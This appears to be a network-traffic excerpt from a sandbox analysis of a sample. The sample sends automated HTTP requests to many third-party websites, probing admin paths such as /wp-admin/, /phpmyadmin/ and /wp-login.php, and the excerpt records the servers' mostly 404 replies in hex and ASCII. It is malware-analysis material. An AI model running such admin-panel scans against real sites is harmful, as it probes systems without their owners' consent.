                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 45 42 53 49 54 45 2e 57 53 20 2d 20 59 6f 75 72 20 49 6e 74 65 72 6e 65 74 20 41 64 64 72 65 73 73 20 46 6f 72 20 4c 69 66 65 26 74 72 61 64 65 3b 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 2c 2a 22 20 62 6f 72 64 65 72 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 62 73 69 74 65 2e 77 73 2f 77 63 5f 6c 61 6e 64 69 6e 67 2e 64 68 74 6d 6c 3f 64 6f 6d 61 69 6e 3d 66 65 64 79 61 6e 69 6e 2e 77 73 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 61 75 74 6f 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 2f 3e 0a 09 3c 6e 6f 66 72 61 6d 65 73 3e 0a 09 09 3c 70 3e 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 66 72 61 6d 65 73 2e 20 43 6f 6e 74 69 6e 75 65 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 62 73 69 74 65 2e 77 73 2f 77 63 5f 6c 61 6e 64 69 6e 67 2e 64 68 74 6d 6c 3f 64 6f 6d 61 69 6e 3d 66 65 64 79 61 6e 69 6e 2e 77 73 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 62 73 69 74 65 2e 77 73 2f 77 63 5f 6c 61 6e 64 69 6e 67 2e 64 68 74 6d 6c 3f 64 6f 6d 61 69 6e 3d 66 65 64 79 61 6e 69 6e 2e 77 73 3c 2f 61 3e 2e 3c 2f 70 3e 0a 09 3c 2f 6e 6f 66 72 61 6d 65 73 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>WEBSITE.WS - Your Internet Address For Life&trade;</title><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><frameset rows="100%,*" border="0" frameborder="0"><frame src="https://www.website.ws/wc_landing.dhtml?domain=fedyanin.ws" scrolling="auto" frameborder="0" /><noframes><p> Your browser does not support frames. Continue to <a href="https://www.website.ws/wc_landing.dhtml?domain=fedyanin.ws">https://www.website.ws/wc_landing.dhtml?domain=fedyanin.ws</a>.</p></noframes></frameset></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                131192.168.2.6565813.64.163.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.006316900 CET226OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                132192.168.2.656652195.68.234.25280
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.197907925 CET231OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: www.pfprojekt.sk
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.421955109 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Vary: accept-language,accept-charset
                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                                                                                                                                                Data Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 30 62 0d 0a 61 64 6d 69 6e 40 70 66 70 72 6f 6a 65 6b 74 2e 73 6b 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 33 0d 0a 61 64 6d 69 6e 40 70 66 70 72 6f 6a 65 6b 74 2e 73 6b 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0d 0a 31 31 0d 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 31 0d 0a 34 30 34 3c 2f 68 32 3e 0a 3c 61 64 64 72 65 73 73 3e 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 33 0d 0a 77 77 77 2e 70 66 70 72 6f 6a 65 6b 74 2e 73 6b 3c 2f 61 3e 3c 62 72 20 2f 3e 0a 20 20 3c 73 70 61 6e 3e 0d 0a 32 39 0d 0a 41 70 61 63 68 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f
                                                                                                                                                                                                                                                                                                                Data Ascii: c8<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="13en"><head><title>38Object not found!</title><link rev="made" href="mailto:10badmin@pfprojekt.sk" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>1bObject not found!</h1><p>39 The requested URL was not found on this server. 57 If you entered the URL manually please check your spelling and try again. 29</p><p>48If you think this is a server error, please contactthe <a href="mailto:23admin@pfprojekt.sk">webmaster</a>.11</p><h2>Error 21404</h2><address> <a href="/">23www.pfprojekt.sk</a><br /> <span>29Apache</span></address></body></
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.422667027 CET73INData Raw: 68 74 6d 6c 3e 0a 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: html>10


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                133192.168.2.656655195.68.234.25280
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.204956055 CET225OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: www.pfprojekt.sk
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.433391094 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Vary: accept-language,accept-charset
                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                                                                                                                                                Data Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 30 62 0d 0a 61 64 6d 69 6e 40 70 66 70 72 6f 6a 65 6b 74 2e 73 6b 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 33 0d 0a 61 64 6d 69 6e 40 70 66 70 72 6f 6a 65 6b 74 2e 73 6b 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0d 0a 31 31 0d 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 31 0d 0a 34 30 34 3c 2f 68 32 3e 0a 3c 61 64 64 72 65 73 73 3e 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 33 0d 0a 77 77 77 2e 70 66 70 72 6f 6a 65 6b 74 2e 73 6b 3c 2f 61 3e 3c 62 72 20 2f 3e 0a 20 20 3c 73 70 61 6e 3e 0d 0a 32 39 0d 0a 41 70 61 63 68 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f
                                                                                                                                                                                                                                                                                                                Data Ascii: c8<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="13en"><head><title>38Object not found!</title><link rev="made" href="mailto:10badmin@pfprojekt.sk" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>1bObject not found!</h1><p>39 The requested URL was not found on this server. 57 If you entered the URL manually please check your spelling and try again. 29</p><p>48If you think this is a server error, please contactthe <a href="mailto:23admin@pfprojekt.sk">webmaster</a>.11</p><h2>Error 21404</h2><address> <a href="/">23www.pfprojekt.sk</a><br /> <span>29Apache</span></address></body></
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.433571100 CET73INData Raw: 68 74 6d 6c 3e 0a 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: html>10


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                134192.168.2.65667669.160.38.280
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.214298010 CET224OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: 3marc.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.376754045 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                135192.168.2.65667781.31.35.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.255717039 CET233OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: evropskypravnik.cz
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.450146914 CET425INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                136192.168.2.6567543.64.163.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.396972895 CET228OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.588700056 CET346INHTTP/1.1 410 Gone
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 39 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 6c 61 2d 6d 6f 72 61 64 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7<html>9 <head>49 <meta http-equiv='refresh' content='0; url=http://la-morada.com/' />a </head>8</html>0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                137192.168.2.65680181.31.35.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.469691992 CET228OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: evropskypravnik.cz
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.663321972 CET425INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                138192.168.2.656804188.120.236.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.492850065 CET227OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: eremina.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.718060017 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Fri, 01 Dec 2023 22:09:30 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 1245
